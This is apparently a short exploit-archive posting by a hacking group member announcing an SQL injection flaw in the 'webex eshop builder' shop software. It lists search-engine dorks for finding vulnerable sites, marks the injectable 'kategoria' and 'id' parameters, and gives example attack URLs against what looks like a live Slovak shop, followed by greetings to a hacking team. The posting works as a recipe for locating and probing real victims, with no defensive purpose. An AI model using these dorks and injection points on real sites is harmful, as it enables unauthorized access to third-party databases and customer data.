-------------------- IN The NAme OF God -------------------- -====webex eshop builder Sql Injection====- # Exploit Title: webex eshop builder Sql Injection # Exploit Author: Mr.XpR # Tested on: BackTrack # Script Site : http://www.webex.sk/ # MAil : No0PM[at]yahoo[dot]com -====Dork====- inurl:index.php?m=detail&id= inurl:m=detail&id= -====Exploit====- http://professionalsport.sk/eshop/index.php?m=search&kategoria=[Sqli] -====Example====- http://professionalsport.sk/eshop/index.php?m=detail&id=2283' http://professionalsport.sk/eshop/index.php?m=search&kategoria=999' -====Tnx To====- MMT- Syamak Black - Samim.s - FarbodEZRaeL - Inj3Ctor - UnknowN Yaghi_Vahshi - HELLBOY - IrIsT - Black_King - Monfared - Sokote_Vahshat ... And All IraNHAck Security Team Members iranhack.org